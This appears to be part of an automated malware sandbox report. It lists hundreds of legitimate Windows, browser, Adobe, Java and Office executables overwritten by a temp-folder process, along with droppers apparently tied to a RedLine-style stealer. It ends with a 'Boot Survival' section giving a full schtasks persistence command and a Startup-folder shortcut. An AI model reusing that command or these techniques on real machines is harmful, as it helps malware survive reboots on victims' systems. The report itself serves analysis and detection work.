                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\SearchIndexer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\TieringEngineService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\AgentService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\FXSSVC.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                            Source: C:\Windows\SysWOW64\svchost.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\SensorDataService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\msdtc.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\pingsender.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\vds.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\microsofts.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\snmptrap.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\Spectrum.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\Locator.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\7-Zip\7z.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\AppVClient.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\SysWOW64\perfhost.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\7-Zip\7zG.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\msiexec.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\TieringEngineService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\firefox.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\FXSSVC.exe
                            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\SensorDataService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\msdtc.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\wbem\WmiApSrv.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\TieringEngineService.exe
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\vds.exe
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File created: C:\Windows\System32\msiexec.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04AFCBD0 StrStrIW, CloseHandle, StrStrIW, CloseServiceHandle, OpenServiceW, StrStrIW, _wcslen, ChangeServiceConfigW, StrStrIW, StrStrIW, CloseServiceHandle, CloseHandle, StartServiceW

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\TieringEngineService.exe | File created: C:\System Volume Information\Heat\
